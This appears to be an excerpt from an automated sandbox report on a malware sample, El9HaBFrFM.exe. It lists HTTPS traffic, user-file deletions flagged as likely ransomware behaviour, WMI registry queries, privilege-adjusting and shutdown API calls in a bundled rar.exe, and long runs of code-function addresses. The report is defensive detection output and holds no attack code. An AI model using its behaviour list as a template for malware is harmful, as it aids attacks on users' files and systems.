Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51282
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51404 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51438 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51280 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51287
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51288
Source: unknown	Network traffic detected: HTTP traffic on port 51325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51285
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51286
Source: unknown	Network traffic detected: HTTP traffic on port 51450 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51289
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51290
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51291
Source: unknown	Network traffic detected: HTTP traffic on port 51393 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51294
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51295
Source: unknown	Network traffic detected: HTTP traffic on port 51348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51292
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51293
Source: unknown	Network traffic detected: HTTP traffic on port 51370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51405 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51518 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51416 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51359 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51298
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51299
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51296
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51297
Source: unknown	Network traffic detected: HTTP traffic on port 51427 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51475 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51314 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51291 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51461 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 51381 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51348
Source: unknown	Network traffic detected: HTTP traffic on port 51417 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51469
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51349
Source: unknown	Network traffic detected: HTTP traffic on port 51484 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51342
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51463
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51343
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51464
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51340
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51461
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51341
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51462
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51346
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51467
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51347
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51468
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51344
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51465
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51345
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51466
Source: unknown	Network traffic detected: HTTP traffic on port 51369 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51323 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51470
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51350
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51471
Source: unknown	Network traffic detected: HTTP traffic on port 51346 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443

Source: unknown

HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:51254 version: TLS 1.2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ??? ? ?\Common Files\Desktop\YPSIACHYXW.png	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ??? ? ?\Common Files\Desktop\DVWHKMNFNN.mp3	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ??? ? ?\Common Files\Desktop\VLZDGUKUTZ.docx	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ??? ? ?\Common Files\Desktop\DVWHKMNFNN.pdf	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ??? ? ?\Common Files\Desktop\DVWHKMNFNN.xlsx	Jump to behavior

Source: cmd.exe

Process created: 59

System Summary

Writes or reads registry keys via WMI

Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue

Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe

Code function: 83_2_00007FF6D7EED2C0: CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

83_2_00007FF6D7EED2C0

Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe

Code function: 83_2_00007FF6D7F1B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,

83_2_00007FF6D7F1B57C

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3C6964	0_2_00007FF6BA3C6964
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3A89E0	0_2_00007FF6BA3A89E0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3A1000	0_2_00007FF6BA3A1000
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3B1B50	0_2_00007FF6BA3B1B50
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3C5C00	0_2_00007FF6BA3C5C00
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3B2C10	0_2_00007FF6BA3B2C10
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3C3C10	0_2_00007FF6BA3C3C10
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3C08C8	0_2_00007FF6BA3C08C8
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3C6418	0_2_00007FF6BA3C6418
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3AACAD	0_2_00007FF6BA3AACAD
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3AA474	0_2_00007FF6BA3AA474
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3B5D30	0_2_00007FF6BA3B5D30
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3B39A4	0_2_00007FF6BA3B39A4
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3B1944	0_2_00007FF6BA3B1944
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3B2164	0_2_00007FF6BA3B2164
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3BDA5C	0_2_00007FF6BA3BDA5C
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3AA2DB	0_2_00007FF6BA3AA2DB
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3B8794	0_2_00007FF6BA3B8794
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3B1740	0_2_00007FF6BA3B1740
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3B1F60	0_2_00007FF6BA3B1F60
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3A9800	0_2_00007FF6BA3A9800
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3C40AC	0_2_00007FF6BA3C40AC
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3C1874	0_2_00007FF6BA3C1874
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3C08C8	0_2_00007FF6BA3C08C8
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3B80E4	0_2_00007FF6BA3B80E4
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3B35A0	0_2_00007FF6BA3B35A0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3B1D54	0_2_00007FF6BA3B1D54
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3BE570	0_2_00007FF6BA3BE570
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3C5E7C	0_2_00007FF6BA3C5E7C
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3B9EA0	0_2_00007FF6BA3B9EA0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3C9728	0_2_00007FF6BA3C9728
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3BDEF0	0_2_00007FF6BA3BDEF0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3C6964	1_2_00007FF6BA3C6964
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3A1000	1_2_00007FF6BA3A1000
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3B1B50	1_2_00007FF6BA3B1B50
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3C5C00	1_2_00007FF6BA3C5C00
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3B2C10	1_2_00007FF6BA3B2C10
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3C3C10	1_2_00007FF6BA3C3C10
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3C08C8	1_2_00007FF6BA3C08C8
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3C6418	1_2_00007FF6BA3C6418
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3AACAD	1_2_00007FF6BA3AACAD
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3AA474	1_2_00007FF6BA3AA474
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3B5D30	1_2_00007FF6BA3B5D30
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3B39A4	1_2_00007FF6BA3B39A4
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3B1944	1_2_00007FF6BA3B1944
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3B2164	1_2_00007FF6BA3B2164
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3A89E0	1_2_00007FF6BA3A89E0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3BDA5C	1_2_00007FF6BA3BDA5C
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3AA2DB	1_2_00007FF6BA3AA2DB
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3B8794	1_2_00007FF6BA3B8794
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3B1740	1_2_00007FF6BA3B1740
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3B1F60	1_2_00007FF6BA3B1F60
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3A9800	1_2_00007FF6BA3A9800
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3C40AC	1_2_00007FF6BA3C40AC
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3C1874	1_2_00007FF6BA3C1874
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3C08C8	1_2_00007FF6BA3C08C8
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3B80E4	1_2_00007FF6BA3B80E4
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3B35A0	1_2_00007FF6BA3B35A0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3B1D54	1_2_00007FF6BA3B1D54
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3BE570	1_2_00007FF6BA3BE570
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3C5E7C	1_2_00007FF6BA3C5E7C
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3B9EA0	1_2_00007FF6BA3B9EA0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3C9728	1_2_00007FF6BA3C9728
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3BDEF0	1_2_00007FF6BA3BDEF0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFA9E0350	1_2_00007FFDFA9E0350
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFA931300	1_2_00007FFDFA931300
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFA932270	1_2_00007FFDFA932270
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFA931950	1_2_00007FFDFA931950
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAF5C00	1_2_00007FFDFAAF5C00
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAADBAE0	1_2_00007FFDFAADBAE0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAF9A60	1_2_00007FFDFAAF9A60
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB155A	1_2_00007FFDFAAB155A
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB1654	1_2_00007FFDFAAB1654
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB21C6	1_2_00007FFDFAAB21C6
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB13DE	1_2_00007FFDFAAB13DE
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAB77A20	1_2_00007FFDFAB77A20
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB1596	1_2_00007FFDFAAB1596
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAFD980	1_2_00007FFDFAAFD980
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB1546	1_2_00007FFDFAAB1546
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB1AD7	1_2_00007FFDFAAB1AD7
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAD6030	1_2_00007FFDFAAD6030
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB1FDC	1_2_00007FFDFAAB1FDC
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAFDE50	1_2_00007FFDFAAFDE50
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB21E4	1_2_00007FFDFAAB21E4
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB17F8	1_2_00007FFDFAAB17F8
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAB1D2D0	1_2_00007FFDFAB1D2D0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB2702	1_2_00007FFDFAAB2702
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB24DC	1_2_00007FFDFAAB24DC
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB1C12	1_2_00007FFDFAAB1C12
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAB23650	1_2_00007FFDFAB23650
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB1A0F	1_2_00007FFDFAAB1A0F
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB2617	1_2_00007FFDFAAB2617
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB1EE2	1_2_00007FFDFAAB1EE2
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAE8920	1_2_00007FFDFAAE8920
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAB28870	1_2_00007FFDFAB28870
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB1618	1_2_00007FFDFAAB1618
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB117C	1_2_00007FFDFAAB117C
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB149C	1_2_00007FFDFAAB149C
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB1CBC	1_2_00007FFDFAAB1CBC
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAB2AC80	1_2_00007FFDFAB2AC80
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB1B54	1_2_00007FFDFAAB1B54
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB1D93	1_2_00007FFDFAAB1D93
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB8720	1_2_00007FFDFAAB8720
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB116D	1_2_00007FFDFAAB116D
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB16FE	1_2_00007FFDFAAB16FE
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB089060	1_2_00007FFDFB089060
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB144C70	1_2_00007FFDFB144C70
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0D92B0	1_2_00007FFDFB0D92B0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0E2250	1_2_00007FFDFB0E2250
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0C9B90	1_2_00007FFDFB0C9B90
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0C3C10	1_2_00007FFDFB0C3C10
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB172BF0	1_2_00007FFDFB172BF0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB11CC40	1_2_00007FFDFB11CC40
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0FCC59	1_2_00007FFDFB0FCC59
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0DCC40	1_2_00007FFDFB0DCC40
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB12BB00	1_2_00007FFDFB12BB00
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB116B40	1_2_00007FFDFB116B40
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB124B20	1_2_00007FFDFB124B20
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0E99A0	1_2_00007FFDFB0E99A0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0CFA10	1_2_00007FFDFB0CFA10
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0C288E	1_2_00007FFDFB0C288E
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB105880	1_2_00007FFDFB105880
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0CA8C0	1_2_00007FFDFB0CA8C0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0D6930	1_2_00007FFDFB0D6930
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB122950	1_2_00007FFDFB122950
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB174FC0	1_2_00007FFDFB174FC0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB14BFC0	1_2_00007FFDFB14BFC0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0E8020	1_2_00007FFDFB0E8020
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0E7040	1_2_00007FFDFB0E7040
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB104E70	1_2_00007FFDFB104E70
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB15CEA0	1_2_00007FFDFB15CEA0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB13CF30	1_2_00007FFDFB13CF30
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0EDDB0	1_2_00007FFDFB0EDDB0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0D0DC0	1_2_00007FFDFB0D0DC0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB158C80	1_2_00007FFDFB158C80
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB11BCC0	1_2_00007FFDFB11BCC0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB14ACA0	1_2_00007FFDFB14ACA0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0D9D00	1_2_00007FFDFB0D9D00
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0CBD30	1_2_00007FFDFB0CBD30
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0DC380	1_2_00007FFDFB0DC380
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB1343B0	1_2_00007FFDFB1343B0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0DD2B0	1_2_00007FFDFB0DD2B0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB10F2D0	1_2_00007FFDFB10F2D0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB1842B0	1_2_00007FFDFB1842B0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0C32F5	1_2_00007FFDFB0C32F5
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB14A300	1_2_00007FFDFB14A300
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0EF2F0	1_2_00007FFDFB0EF2F0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0ED310	1_2_00007FFDFB0ED310
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0C7336	1_2_00007FFDFB0C7336
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB127350	1_2_00007FFDFB127350
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0D21E0	1_2_00007FFDFB0D21E0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB0C4120	1_2_00007FFDFB0C4120
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD9A423027	6_2_00007FFD9A423027
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 46_2_00007FFD9A343A4D	46_2_00007FFD9A343A4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 46_2_00007FFD9A4117D9	46_2_00007FFD9A4117D9
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7ED1884	83_2_00007FF6D7ED1884
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EDB540	83_2_00007FF6D7EDB540
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EE54C0	83_2_00007FF6D7EE54C0
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7ED82F0	83_2_00007FF6D7ED82F0
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EE1180	83_2_00007FF6D7EE1180
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EFAE10	83_2_00007FF6D7EFAE10
